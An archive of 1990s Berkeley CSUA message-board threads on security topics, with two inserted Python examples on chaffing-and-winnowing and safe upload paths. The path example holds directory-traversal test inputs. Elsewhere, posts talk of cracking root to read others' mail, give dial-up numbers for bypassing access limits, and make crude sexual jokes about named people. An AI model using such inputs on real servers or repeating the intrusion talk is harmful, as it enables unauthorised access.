            you.  ssh to the remote host and run your x commands normally
            SSH 'silently' sets your DISPLAY environment correctly for you,
            and your shell commands will inherit it. -ERic
            \_ Where can I go to find docs to do the setup correctly?  Or
               is it simple enough to post here?  -emarkp
               \_ Have you actually tried to run xterm already?  If it
                  didn't work, maybe you want to give the error mesg
                  encountered.
                \_ The freeware 1.22 unix package had plenty of docs. RTFM.
                   It isn't that hard.
            \_ well the  'default setup' works 'correctly'.  If you have an
               idiot sysadmin who changed the defaults and put in things like
               disabling xforwarding in sshd config, then it won't work. -ERic
1998/4/14 [Computer/SW/Security, Computer/SW/OS/Windows] UID:13950 Activity:high
4/14   What's with the login uname? MS-DOS V3.3 ? Is this joke going to
       last forever?
       \_ It's no joke.  We've secretly replaced soda with an MS-DOS machine
          (with Microsoft DOS/Connect for networking) and we were hoping no
          one would notice -- but damn it, you've spoiled everything.  --root
          \_ MS-D0S???/?  1 CAN RUN K1NG"Z QU3ST 0N 1T!!!!1!!!
             BUT H0W DU 1 S3ND TH3 P1CTURZ 2 MY SKR33N??????  H3LP!!!1!
          \_ alias ver 'uname -a'
        \_ some perpetual April's Fools Joke
        \_ The best one so far, IMHO            -muchandr
        \_ The joke's still there.  jon@csua attaching his name as if
           he has done anything.
1998/4/2 [Computer/SW/Security] UID:13893 Activity:nil
4/1     What is the difference between a segmentation fault and a bus error?
        \_ segmentation is an address fault. you have attempted to access
           an invalid address or one you do not have permission to access.
           bus error is usually an alignment violation. attempting to access
           an int on a non-word boundary, for example. --aaron
           \_ But why is it called bus error?  not alignment error?
                \_ It goes back to the days when Muni's schedule system was
                   computerised.  Due to boundary/alignment errors, they were
                   sending all the busses on the same route at the same time.
                   Thus, the bus error was created.
1998/3/22-23 [Computer/SW/Security] UID:13849 Activity:high
3/21    Ron Rivest is at it again: he's invented a technique to achieve
        message confidentiality with hash functions and no encryption,
        simple, intuitive, and completely non-export-controlled.
        http://theory.lcs.mit.edu/~rivest/chaffing.txt
        \_ note that he's just rephrased steganography to have a more dynamic
           method of mixing the message bits into another data stream, and he
           relies on message authentication to reject the superfluous data.
           old mechanical crypto systems in the 60s did stuff like that
           but filtered by using the same pseudo-random sequence as the
           sender. Rivest's method will require a good random generator at
           the sender (to permute packet order for the chaff). it will
           \_ why do you think that?  my reading of his text didn't imply
              any packet order changes, just one or more chaff mesgs per
              valid packet.  please mail me --oj
              \_ The packets go out in the same order, but you have to send
                 chaff too, and the chaff has to be in an unpredictable
                 order with respect to the wheat.  If you always do
                 wheat1-chaff1-chaff1 wheat2-chaff2-chaff2 wheat3-chaff3-chaff3
                 it's not hard to figure out where the wheat is.
           also probably make everybody's exportable authentication code
           get reclassified as munitions, now that someone's pointed out
           how it "really is encryption" (the way regulators think). --karlcz
           p.s. he also requires that the secret authentication key get
           transported by some other secure means (public-key encryption
           for those of us without exploding-attache-case couriers ;-).
        \_ I'm not too terribly impressed.  As karlcz pointed out there's
           still this secret-key business that's required to create valid MACs
           and I'm not really psyched about the typical CSUA idiot adding
           300 chaff packets per wheat packet to keep their email and porn
           URLs secret from "Them".  The net is slogged enough as it is.
           What really needs to happen is to drop the ridiculous export
           controls.  If I'm a terrorist or in the mafia, I _am_ going to
           \_ That was exactly Rivest's point, though.  Obviously a block
              cipher is much more effective than chaffing, but it's currently
              in a very different political position.  But Rivest's own
              conclusion is: "Mandating government access to all communications
              is not a viable alternative.  The cryptography debate should
              proceed by mutual education and voluntary actions only."  That
              goes for international controls as well as domestic.
           use the best possible encryption for all communications, and
           be damned the US law.  Hello, duh, a terrorist or high powered
           mafioso is already going away for life.  Going to add 3 months
           of consecutive time for an encryption export violation?!?
           \_ you miss the point.  If encryption were export legal, then it'd
              be easy to market via consumer channels.  Once that happens,
              you can pretty much kiss good-bye law enforcement's ability to
              wire-tap even the petty criminals.
              \_ So the point wasn't to make a decent and reasonable secure
                 communications method, but was simply to snub law enforcement
                 with a hacked end run?
                 \_ Yeah, kinda looks that way.
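
The scheme argued over in this thread, as an added sketch (not code from Rivest's note or from any poster). It works at the bit level: each serial number goes out twice, once as wheat with a valid MAC and once as chaff with a random tag. HMAC-SHA256, the packet layout and all function names are assumptions of this example. It also shows the ordering point raised above: if wheat always precedes its chaff, no key is needed to read the message.

```python
import hashlib
import hmac
import secrets

TAG_LEN = hashlib.sha256().digest_size


def tag(key: bytes, serial: int, bit: int) -> bytes:
    """MAC over (serial, bit). HMAC-SHA256 is this example's choice of MAC."""
    msg = serial.to_bytes(8, "big") + bytes([bit])
    return hmac.new(key, msg, hashlib.sha256).digest()


def to_bits(data: bytes) -> list:
    return [(byte >> shift) & 1 for byte in data for shift in range(7, -1, -1)]


def from_bits(bits: list) -> bytes:
    out = bytearray()
    for i in range(0, len(bits), 8):
        byte = 0
        for b in bits[i:i + 8]:
            byte = (byte << 1) | b
        out.append(byte)
    return bytes(out)


def chaff(key: bytes, data: bytes, shuffle: bool = True) -> list:
    """Sender: emit (serial, bit, tag) packets, one wheat and one chaff per bit.

    The payload bits travel in the clear; only the tags depend on the key.
    shuffle=False reproduces the fixed wheat-then-chaff order criticised in
    the thread.
    """
    rng = secrets.SystemRandom()
    packets = []
    for serial, bit in enumerate(to_bits(data)):
        pair = [
            (serial, bit, tag(key, serial, bit)),             # wheat
            (serial, bit ^ 1, secrets.token_bytes(TAG_LEN)),  # chaff, bogus tag
        ]
        if shuffle:
            rng.shuffle(pair)
        packets.extend(pair)
    return packets


def winnow(key: bytes, packets: list) -> bytes:
    """Receiver: keep only packets whose tag verifies, then reassemble."""
    bits = {}
    for serial, bit, t in packets:
        if hmac.compare_digest(t, tag(key, serial, bit)):
            if bits.setdefault(serial, bit) != bit:
                raise ValueError(f"serial {serial}: both bit values authenticate")
    expected = max((s for s, _, _ in packets), default=-1) + 1
    if len(bits) != expected:
        raise ValueError("some serials have no authentic packet (wrong key?)")
    return from_bits([bits[i] for i in range(expected)])


def guess_by_position(packets: list) -> bytes:
    """Keyless observer: assume the first packet seen per serial is wheat."""
    first = {}
    for serial, bit, _ in packets:
        first.setdefault(serial, bit)
    return from_bits([first[i] for i in range(len(first))])


if __name__ == "__main__":
    key = secrets.token_bytes(32)          # shared out of band, as karlcz notes
    message = b"winnow this text"          # constructed sample input
    print(winnow(key, chaff(key, message)))
    print(guess_by_position(chaff(key, message, shuffle=False)))
```
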
1998/2/17-18 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:13682 Activity:high
02/16   In Apache, when I use .htaccess, how do I "log-off" from a browser?
        Thanks.
        \_ You're not "logged on" in the first place; http connections are
           stateless.  If the browser decides to store the username and
           password, that's the browser's business.
                \_ Okay then, how do I make the browser not use the username
                   and password during HTTP transaction then?
                        \_ Restart the browser or get one that lets you
                                clear stored passwords
                           \_ Restart-- you mean quit and start again? Sheesh
                                \_ Yep - sucks don't it?
                                \_ Yep.  Sucks don't it?
                        \_ It's totally browser-dependent.  Once Netscape
        /------------------/
        Once Netscape releases the source, expect the days to look like the
        80's when people have to deal with DOS 2.0/3.0/MSDOS/Windows 2.0/OS2
        Geoworks OS incompatibility, not mentioning incompatibilities between
        MSWord/WordPerfect/WordStar/AmiPro/Lotus/blah blah blah. Proliferation
        of many different warez means happiness and perhaps some creativity but
        it also means a lot of headache for the end users. Are the average
        American Joe sophisticated enough that they can handle so many
        different platforms with different HTML standards, plug-ins, c00l
        features, this and that, or they just want a simple burger that
        satisfies their stomach? What do the dumb average American Joes want?
                           releases the source you could make a "forget
                           passwords" button or something.
        \_ Seriously doubt Joe User is going to d/l a hacked up copy of NS
           from http://www.butchery.org  They're going to go to netscape, as always,
           and d/l the version made available by the NS people.  The NS
           version is going to be a "best-of-the-net" browser.  Or so says
        \_ Dronage deleted.  For your reference, it said:
        "\_ Next drone deletion means deletion of entire motd. Watch it u nazi."
           NS.
                \_ so?  what does this have to do with the above?
        "You have been warned"
           NS.
                \_ So?  What does this have to do with anything?
                  \_ It has to do with a large piece of text that was deleted.
1998/2/13-14 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:13664 Activity:moderate
2/12   Last month, the Clinton Administration announced that it will spend
       $28 million to retrain workers, create an Internet jobs bazaar and try
       to convince kids that the computer sciences are cool. The p.-r.
       blitz will include public service videos starring Jimmy Smits,
       tough-guy star of the television cop show NYPD Blue.
        \_ Isn't CS61A full enough already?
          \_ Not enough potstickers to go around anymore?
        \_ Oh good.. flood the industry with idiots and marginalize all of us.
          \_ The CS61A undergraduate teaching assistant industry?
        \_ WONDERFUL. More Microsoft-like people writing more code, and now
           applications will crash way more than ever. I remember the good 'ol
           days of text applications with DOS and apps just don't crash the
           way they do now. Microsoft/Netscape are two fine examples.
1998/2/4-5 [Computer/SW/Security] UID:13623 Activity:high
2/4     I have an obsession to crack root to read people's emails.
        Is that normal?
                \_ yes
        \_ ask marco
        \_ How would you do it on shadowed systems?
                \_ The Shadow knows....
                \_ <DEAD>www.rootshell.com<DEAD>
        \_ Don't bother.  As a sysadmin who has had real work reasons to
           read mail files over the years, I can assure you that no one's
           mail is worth reading, much less the effort required to acquire
           the access to do so.
           \_ but you get some good jokes sometimes...
1998/2/2-3 [Computer/SW/Security] UID:13608 Activity:moderate
2/2     If you've experienced frequent loss of connection to soda it's
        because you turned on your wall (wallall y).  Try turning them off
        and tail the wall log instead (tail -f) and see if that improves
        the reliability for you.
        \_ Do you have any basis for this statement at all?
                \_ Trust me on this one.
        \_ So you're saying that wallall affects my packets not being able to
           get through some router btwn my ISP and UCB? Wow.
           \_ Yeah, didn't you read the CERT advisory of April 1, 1997,
              "wallall Denial of Service Attack"?
        \_ Wall is more than just a program; it is a way of life.
        \_ Beware The Wall.  We don't need no education.
1998/2/2-3 [Computer/SW/Security, Computer/SW/Languages/Misc, Computer/SW/Unix] UID:13607 Activity:high
2/1     What is the easiest way to allow people (actually myself) to upload
        stuff through my web page?  --- clueless
        \_ DON'T DO IT.
        \_ This may open you up to a lot of security risks; think carefully
           when you implement something.  How do you want to do it?  Do you
           want to enter text into a form and then have it available as a
           file in an account somewhere?
           \_ Don't listen to these idiots.  The easiest way is probably
              HTTP PUT; see the Apache documentation.
                \_ Oh really?  So where's a page you wrote that allows
                   uploads?  Post the URL so we can all have fun hacking it.
                   \_ Why don't you just tell us how to hack HTTP PUT.
                      \_ "There are few scripts available which implement PUT
                         handling securely." _Apache Week_, April 4 1997
                         In concept it _can_ be secure, but it's not an
                         unrealistic concern; frequently the PUT scripts
                         have holes, even more than other CGI stuff.
                         \_ PUT is fairly simple; it is not difficult to write
                            a secure PUT script.  You don't need "many"
                            scripts available which implement PUT securely,
                            you only need one.
                            \_ right, but first you've got to find it. :-)
                                \_ If you use suexec, it's not hard to
                                   write one.  Just make all paths relative
                                   to the document root and disallow ".."
                                   and other funky characters.
                \_ YES! suexec is much more secure! We really should run
                   httpd on soda instead of scotch so that one will not be
                   able to kill the "nobody" process arbitrarily.
                                   \_ I'm still waiting to see your secure
                                      page.  Post the URL when you're ready.
                   \_ Oh, give it up.
        \_ thanks for all your responses.  I wanted to do this as a way to
           replace ftp to transfer my manifestos:-).  The web server is going
           to be running only when I need to transfer file and is shut down
           the moment the transfer is done.  So I guess it does not need to
           be too secure.  Anyway, the question is now whether I will get
           enough clue to find out how to write a minimal script. -- clueless
           \_ You must be too sexy to use scp.
              \_  No, Jobs is too sexy to have scp developed for mac.
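
The path rule suggested in this thread ("make all paths relative to the document root and disallow '..' and other funky characters"), as an added example that is not from any poster or from Apache. The function names, the per-segment allowlist and the sample request paths are assumptions of this example. It goes one step beyond the thread by also refusing symlinks that lead out of the document root.

```python
import os
import re
import tempfile

# One path segment: starts alphanumeric, so "..", "." and dotfiles such as
# ".htaccess" are refused; "%", ";", "\" and NUL are not in the allowlist.
SEGMENT = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


class RejectedPath(ValueError):
    pass


def naive_target(doc_root: str, request_path: str) -> str:
    """What a careless PUT handler does: join the client's path and trust it."""
    return os.path.normpath(os.path.join(doc_root, request_path.lstrip("/")))


def safe_target(doc_root: str, request_path: str) -> str:
    """Map a request path to a file under doc_root, or raise RejectedPath."""
    root = os.path.realpath(doc_root)
    segments = request_path.strip("/").split("/")
    for seg in segments:
        if not SEGMENT.fullmatch(seg):
            raise RejectedPath(f"bad path segment: {seg!r}")
    # Resolve symlinks in the directory part, then confirm it is still
    # inside the document root.
    parent = os.path.realpath(os.path.join(root, *segments[:-1]))
    if os.path.commonpath([root, parent]) != root:
        raise RejectedPath("directory resolves outside the document root")
    target = os.path.join(parent, segments[-1])
    if os.path.islink(target):
        raise RejectedPath("target is a symlink")
    return target


# Constructed sample request paths for the demonstration.
REQUESTS = [
    "/docs/manifesto.txt",
    "/../outside/x",
    "/docs/../../outside/x",
    "/docs/.htaccess",
    "/docs/%2e%2e/x",
    "/docs/a;b.txt",
    "/link/x",
    "/link",
]


def demo() -> dict:
    """Build a throwaway document root and classify each sample request."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "public_html")
        outside = os.path.join(tmp, "outside")
        os.makedirs(os.path.join(root, "docs"))
        os.makedirs(outside)
        os.symlink(outside, os.path.join(root, "link"))  # planted escape hatch
        real_root = os.path.realpath(root)
        for path in REQUESTS:
            try:
                results[path] = os.path.relpath(safe_target(root, path), real_root)
            except RejectedPath:
                results[path] = "rejected"
    return results


if __name__ == "__main__":
    for path, outcome in demo().items():
        print(f"{path:28} -> {outcome}")
```

The check and the later open() are separate steps, so a handler using this would still open the target with O_NOFOLLOW | O_CREAT and run under the owner's uid, which is what the suexec remark in the thread is about.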
1998/1/21-22 [Computer/SW/Security] UID:13541 Activity:very high
1/21    ssh versions through 1.2.21 have security hole in ssh-agent - upgrade
        to 1.2.22 or stop using ssh agent until you do.
        \_ Uh oh... you mean people will be able to snoop my incredibly
           sensitive private email and see what porn I'm downloading?  Help!
           Help!  The sky is falling!
        \_ Any URL?
           \_ for the porn?
           \_ See:
              http://www.cs.hut.fi/ssh-archive/messages/980121-145129-28265 -dim
        \_ Once again, is there an URL confirming this?
           \_ http://www.cs.hut.fi/ssh-archive/messages/980121-145129-28265
           \_ Just read the freaking ssh 1.2.22 release notes or
                comp.security.ssh
1997/11/19 [Computer/SW/Security] UID:32164 Activity:nil
11/18   Has anyone had trouble getting xlock to work with shadow
        passwords?  How do I get around it not knowing where to look
        for the passwords?  Having it setuid does not work.  -John
        \_ Hmm, I managed to get version 4.01 to work with shadow
           passwds. Make sure that on top of making the binary setuid
           that the binary is owned by root. -- marc
        \_ /usr/openwin/bin/xlock works fine with shadow passwords.
1997/5/2-15 [Computer/SW/Security, Computer/SW/Unix] UID:32134 Activity:nil
4/25    Every new account on soda comes with a file called "FAQ".  (If
        you lost your copy, a fresh one is always available in
        /usr/local/csua/FAQ .)  Please read it and remember it when you
        have questions/problems.  Asking root questions that it answers
        is grounds for getting really snide or obnoxious responses from
        root, if your mail is answered at all.
1997/4/25 [Computer/SW/Security, Computer/SW/Unix] UID:32127 Activity:nil
4/17    If you ever have problems logging into soda, please check the
        ucb.org.csua newsgroup for announcements of system problems
        before mailing root.  If there is a system problem, mailing
        root just fills root's mail spool once it's fixed and too late
        to do anything about it.  This and other useful information
        was in the FAQ file in your account when it was created.
        Please read it and remember it - if you lost your copy, a
        fresh one is always available in /usr/local/csua/FAQ.
        Asking root questions that it answers is grounds for getting
        really snide or obnoxious responses from root.
1997/1/29 [Computer/SW/Security, Computer/SW/OS/Windows] UID:32049 Activity:nil
1/29    I bought a new HD, 4 gig, and I'd like to move everything from my
        old 1 gig to the 4 gig (4 gig = primary, 1 gig = secondary). Where
        can I find a good DOS backup utility that does this? Thanks.
        \_ DOS Tar's good
         \_ No, it doesn't do long name (8+ char), STUPID
        \_ what's wrong with copy /s d:\ c:\c_drive ?
1996/10/29 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:31974 Activity:nil
10/28   The San Francisco Book Festival's this weekend, if anyone's
        interested... it's generally lots of fun -- interesting authors, poets,
        book crafts, etc.  More information's at http://www.sfbook.org
        There's generally a nominal admission charge, unfortunately. --tabloyd
        \_ you'll pay hundreds for dorky computer equipment which will be worth
           half its value in 6 months, but you complain about a "nominal"
             admissions charge to a book festival... :)
           \_You should hear me complain about computer equipment (which we
             hardly ever buy anyway!).  But I just thought people should be
             aware that there is an admission fee -- you also have to pay to
             buy any books, unlike at the ABA, where it's all free.  --tabloyd
              \_ fair enough! :)
1996/10/29 [Computer/SW/Security, Computer/SW/WWW/Server, Computer/SW/Unix] UID:31973 Activity:nil
10/28   Why aren't the web server logs mounted on soda? People do like
        to see who is accessing their web pages.
        \_ Try mailing root and asking them.  Most likely it's just something
           no one's bothered to do yet as part of the changeover.
        \_ I'll let you serve my logs baby
        \_ I wanna see who's accessing your web pages, too...
1996/10/28-11/4 [Computer/SW/Security] UID:31953 Activity:nil
10/24   IMPORTANT!   A sniffer was caught using one of the Cory Hall
        machines to get passwords to accounts on soda.  He sniffed net
        connections from the 240 subnet to soda and elsewhere.  Please
        change your password if there's any chance your account
        was compromised!
1996/6/5 [Computer/SW/Security, Computer/SW] UID:31849 Activity:nil
6/3  Anyone know how i can change my local address with Sproul over
        the Web?  I know they have a page for address change form...
        anyone know what it is?
         \_ I think that you can only do it from their Bear Facts
            macs that are scattered across campus.  - sagarwal
        \_ http://registrar.berkeley.edu:4202/BearFacts.html
           \_ You'd think they coulda spared a couple of IP addresses
              or something to give it its own host/virtual host ...
         \_Actually DCNS is rather short of IP addresses and would
         rather not have to go buy another block from BBN/Planet
         until they absolutely have to, as the cost of them is going
         way up now that it's for-profit BBN and not the
         non-profit BARRnet running the connections
         Besides, why bother for a server that just says
         "Web access coming soon"?
         \_ They promised to make it accessible via WWW from
          any (campus ?) host but don't bet on it...
          \_ I would - the campus is pushing to get everything
          on the web - less headaches for them that way
1996/6/5 [Computer/SW/Security] UID:31846 Activity:nil
6/4     PLEASE OH PLEASE mount scotch!  Last time I edited my web page,
        I didn't have a beard, and Menudo were still in style.
        \_ it doesn't matter much since no one can access it anyway.
           be patient and someday scotch will be fixed.
           \_ I just want to be able to ftp my files onto UCSEE's web server
              so then people CAN access it.  Please mount it just so that
         we can remove our files.
              \_ We are not going to mount it until scotch is stable.
          As has been mentioned before, if you really really really
          need your files, mail root and someone will get them for
          you and plop them down on soda.       -lila
              \_ How about hacking up a ftpd that allows non-anonymous
          access to scotch to update files?  I could put together
          such a beast... -ERic
1995/3/1 [Computer/SW/Security, Computer/SW/Unix] UID:31773 Activity:nil
3/1     Anyone knows where on campus can I find Xterminals to login directly
        to Soda without a facilities/departmental login?
        \_ yes.
           \_ what a jerk giving these smart ass remarks.
         \_ fuck you. if you want nice friendly advice, get off soda.
             \_ i won't give you the pleasure you nerd.  you can't get
          any.  :P  -word2yomomma!
        \_  343 soda has some xterminals you can use for this, and probably
            the machines in the lounge across the hall also.
            help@soda is generally more cheerful about giving answers.
          --PeterM
           \_ Where is the lounge located exactly and are the machines there
              color terms?  What are the hours for the lounge and 343?
        \_ that _jerk_ can learn something from PeterM. - dookie
1995/3/1-6 [Computer/SW/Security] UID:31768 Activity:nil
2/18    CHANGE YOUR PASSWORD!  Someone has been snooping the net for
        passwords, and apparently got rather a lot of them.
1995/3/1-4 [Computer/SW/Security, Computer/SW/Unix] UID:31767 Activity:nil
2/21    If you would like your account moved to /usr10, mail root. /usr10 has
        lots of space, but has been known to crash.
1995/2/9-11 [Computer/SW/Security] UID:31753 Activity:high
2/9     on-line service surfer wanted for about
        10 hours of work.  send mail to hh@xcf if you're interested.
        you must have familiarity with and access to prodigy, aol,
        and compuserve.

                      _,.-----.,_
                   ,-~           ~-.
                 ,^___           ___^.
                /~"   ~"   .   "~   "~\
               Y  ,--._    I    _.--.  Y
               | Y     ~-. | .-~     Y |
               | |        }:{        | |
               j !       / | \       ! l
            .-~  (__,.--" .^. "--.,__)  ~-.
           (           / / | \ \           )
            \.____,   ~  \/"\/  ~   .____,/
             ^.____                 ____.^
                | |T ~\  !   !  /~ T| |
                | |l   _ _ _ _ _   !| |
                | l \/V V V V V V\/ j |
                l  \ \|_|_|_|_|_|/ /  !
                 \  \[T T T T T T]/  /
                  \  `^-^-^-^-^-^'  /
                   \               /
                    \.           ,/
                      "^-.___.-^"
You're dead.
1995/2/9 [Computer/SW/Security, Computer/SW/Unix] UID:31748 Activity:nil
2/9  Theodore == multiple login from different annex boxes man. Can we turn
        off the little fuckers account now?
          \_that is fucker's ... where is your grammar boy?
             \_ that should be "grammar, boy", as it is
         unlikely that you are talking about a
         child schooled in English who goes around
         explaining mistakes.
           \_ he was just being obtuse. he really meant:
            "... where is your aaron"

theodore  ttyrn    annex-64-1.Berke Thu Feb  9 03:03 - 03:25  (00:22)
theodore  ttyri    annex-64-1.Berke Thu Feb  9 02:58 - 09:40  (06:42)
theodore  ttypC    annex136-4.Berke Thu Feb  9 01:04   still logged in
theodore  ttyrY    annex136-4.Berke Thu Feb  9 00:40 - 02:57  (02:16)
1995/1/21 [Computer/SW/Security, Computer/SW/Unix, Health/Women] UID:31725 Activity:nil
1/20    Do not ask to be blown by root. Rumours of us rendering such
        favors to account holders are highly exaggerated.
        \_ Blow me.
         \_ mail whoeveryouare < prostitute
        \_ Rumor not exaggerated, but we need more women on CSUA staff.
          / \_ This isn't the way to get them...
         | \_ It's a better way to scare them off.
          \_ this pungent tang of feminism confirms a musing I had
             about how a feminist with insight is not a feminist
             at all, but I won't get into it here.
           \_ What makes you think this display of taste
              and maturity only disgusts women?
          \_ I'm sure that's the intent, o wise visionary.
           \_ Men give *way* better head than women.
            \_ You just haven't met the right women.  Or maybe you've just met
        exceptional men.
        \_ You obviously don't understand what I am talking about.
        \_ Rumor has it that ali gives good head.
           \_ not as good as partha (sorry, ali)
              \_ With a name like Banerjee, you know it has to be good
1994/11/11-1995/1/5 [Computer/SW/Security, Computer/SW/Unix] UID:31649 Activity:kinda low
1/5     WWW is now setup on soda.  If you want to setup your own
        home page, cd in /www/<first letter of your login>/<your
        login name>/public_html and put your files there.
        If you do not have a directory in /www/, run
        /usr/local/adm/bin/makeme.
1994/4/28 [Computer/SW/Security, Computer/SW/Unix] UID:31578 Activity:nil
4/27    Someone has a 2.5-megabyte core file in /tmp which has been sitting
        around since 4/26.  Now *I* can't read news because the filesystem's
        full.  Why can't people be even slightly considerate?
        \_ This is soda, that's why.  Nobody gives a shit about what's in
           /tmp and so they don't delete it 'cause it's gonna get nuked
           eventually.  How often does the /tmp sweeper go through anyway?
         \_ Every week or so -- not nearly often enough.  Maybe we
            should have /tmp quotas too.  Say 1 meg soft, 10 megs
            hard or something like that.
          \-that is a stupid idea. look files have names attached
         to them ... just mail the person with a lot of old shit and
         tell them to delete it. cc: root if you want and if someone
         is incessantly a bozo, then root can send something stronger.
           \_ Something stronger you want?  Hmm...how
              about a little chsh or passwd gift?  Or
              maybe just an rm -r on the hoser's acct.
         \_ You twinks, /tmp is cleared of stuff not accessed in 3
            days every night.  Get a clue.
1994/4/11 [Computer/SW/Security, Computer/SW/Unix] UID:31558 Activity:nil
4/10    Still looking for a machine that doesn't crash.  Mail me - root
1994/3/20-4/28 [Computer/SW/Security] UID:31531 Activity:moderate
1/22    Politburo meetings are Fridays at noon in 238 Evans Hall.

         ***UNOFFICIAL MESSAGES BELOW***
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

                  F O R   O F F I C I A L   U S E   O N L Y

                                W A R N I N G

             YOU HAVE REACHED A U.S. GOVERNMENT COMPUTER OR DATA
           BASE, USED SOLELY BY THE U.S. GOVERNMENT, ITS OFFICERS,
              AND AGENTS.  IT IS A VIOLATION OF UNITED STATES CODE, TITLE I8,
        TO ACCESS AND USE U.S. GOVERNMENT COMPUTER RESOURCES WITHOUT
        SPECIFIC AUTHORIZATION.  EACH ACCESS IS SUBJECT TO RECORDING
         AND AUDITING.  WITHOUT SPECIFIC AUTHORIZATION FROM THE U.S.
           GOVERNMENT, YOU ARE AN INTRUDER.  INTRUDERS ARE SUBJECT
             TO CRIMINAL PROSECUTION, FINE, AND/OR IMPRISONMENT.
          ***********************************************************************
            ***COMMUNICATIONS SECURITY MONITORING NOTIFICATION***

            THE USE OF YOUR E-MAIL TERMINAL CONSTITUTES CONSENT TO
                      COMMUNICATIONS SECURITY MONITORING
          ***********************************************************************
              FOR ASSISTANCE CONTACT COMMUNITY SERVICES CENTER
               TELEPHONE: (DSN) (510) 642-7453
                    E-MAIL:  Surveilance@soda.berkeley.edu
1994/3/6 [Science, Computer/SW/Security] UID:31503 Activity:nil
3/6  New cryptology advance renders DES _insecure_. Read sci.crypt for
        more info. Basically a machine like soda can break a 10 char crypt
        in about 8 hours. This has SERIOUS security ramifications.
        \_This technology is not that new.  The U.S. government has not
          allowed DES for use with classified documents for years.  This would
          imply that the government has cracked DES long ago.  If the
          civilian population has been able to crack it too, I would not
          be surprised.
        \_Yeah, and I've got a bridge I'd like to sell you, ya twink.
        \_Nice try.
          \_ Actually, I'm not the owner of the account of the person who
             wrote this. I broke into his account using the new super-duper
             technology fu thingy.
        \_ DES never was secure.  They've had DES-cracking LSI chips for at
           least a year that simply do an exhaustive search of the key-space
           really fast.
1994/2/22 [Computer/SW/Security] UID:31494 Activity:nil
2/21    Read ~boss/Clipper for info on the clipper chip, and for a chance
        to add your name to a petition against it.
         \_ The issue of whether the government has a legal right to
            monitor communications (with the proper search warrant)
            is clouded and ignored by bandying about terms like
            "big brother" and "fascist." It's ludicrous to think that
            the government will monitor *more* communications if
            Clipper passes.
                   \_ It's not ludicrous at all. Monitoring resources are
                      costly. If Clipper is easier -- cheaper -- to monitor
                      than alternative technologies, then the government
                      can listen in more than they would otherwise. Even
                      totalitarians are subject to economics...
            \_ Encryption now: none.
               Ease of tapping: easy.
               Encryption with Clipper: some.
               Ease of tapping: Less.
               This isn't brain surgery.  The government isn't asking
               for anything it doesn't already have.  Deal with the
               real issues instead of fear-mongering.
          \_ In addition, clipper will fool people into thinking
             they're safe when they aren't...so communications
             that were thought too important to trust to the net
             before will become open to the government.
             \_ Not without a search warrant.
                           \_ No, Clipper will fool *stupid* people into
                              thinking they're safe.  There's a difference.
         \_ It could be argued that Clipper provides increased privacy
            since it gives cell phone makers, etc. free encryption
            with no r&d costs.  I'd prefer knowing the line was secure
            from everyone but the cops than open to anyone who knows
            what frequency to listen in on...
         \_ You're assuming that this wonderful algorithm that the
            NSA came up with is a good one.  Since it's so secret,
            it could be total bullshit for all anyone knows...although
            far be it from me to imply that the government is somehow
            able to make mistakes...
          \_ With the incredibly quick advances
             in technology, nothing is secure for more than
             a decade or two.
1993/12/10 [Computer/SW/Security, Computer/SW/Unix] UID:31434 Activity:nil
12/8    Apparently some idiot is going around calling soda users, telling
        them he's root@soda and that he needs their current password.
        root@soda would never do this, and if you're stupid enough to be
        duped by this guy, your account will be shut off.
1993/10/11 [Computer/SW/Security] UID:31413 Activity:nil
10/10   Is leaving pgp on soda a good idea?  the physical control of the
        private key is lost when you leave it on soda...  -curious hoding
        \_ You can leave your public keyring here and use PGP via various
           add-ins for EMACS, Elm, and mail.  Then you can download any
           messages and decode them at home.  That's only if you're paranoid
           though.  You can just as easily just take permissions off the
           file and it will be pretty safe for casual use.
1993/5/26-28 [Computer/SW/Security, Industry/Jobs] UID:31330 Activity:nil
5/19    Berkeley Systems, Inc (makers of the AfterDark screen saver) is looking
        for a full-time assistant in their Access products group -- products
        to make computers accessible by vision-impaired users.  Complete
        details in ~dwallach/bsi.job
1993/5/26 [Computer/SW/Unix, Computer/SW/Security, Computer/Networking] UID:31325 Activity:nil
5/24    Anybody know of an annex port in the Los Angeles area (818 area)
        that would allow me to connect to Berkeley computers?  kmanoj
        \_  dunno, but netcom has a Point Of Presence in LA area somewheres,
            if it's local to you it'll only be 17.50/mo, and you can use it
            in the bay area also....
        \_  How about numbers for UCLA, USC, or CSUN annex ports?  Anybody
            have those?
               forget it bud.  even if you have those numbers, the annex
            port is like berkeley's, won't let you connect outside its system
        \_  I've heard that the annex port at CalTech allows you to telnet
            out, but you need the IP address for whatever machine.
            Sorry, don't know the phone number.  -jesse
        \_ Okay, here's the story boys and girls.  Connect up to a CSU
           server that's local to you.  There's one in Northridge at
           (818) 701-0478; one in Los Alamos at (310) 985-9540.  From
           there, open a connection to SF State with "sf/40" (port 40).
           Then do a "connect <your-favorite-MUD>" command, and you're
           there!  Connection's kinda slow; but hey, it's semi-free!
           (Dunno about legality, so use at your own risk!)  I also
           have those CalTech numbers, so mail me if you want 'em
           -jctwu
        \_ I've warned them of this security hole and it will shortly
           be turned off.
1993/4/18 [Computer/SW/Security, Computer/SW/Unix] UID:31274 Activity:nil
4/17    /usr/local/csua is a goddamn mess, as is the life file.
        Some root hoser should clean it up instead of looking for
        ``criminals''...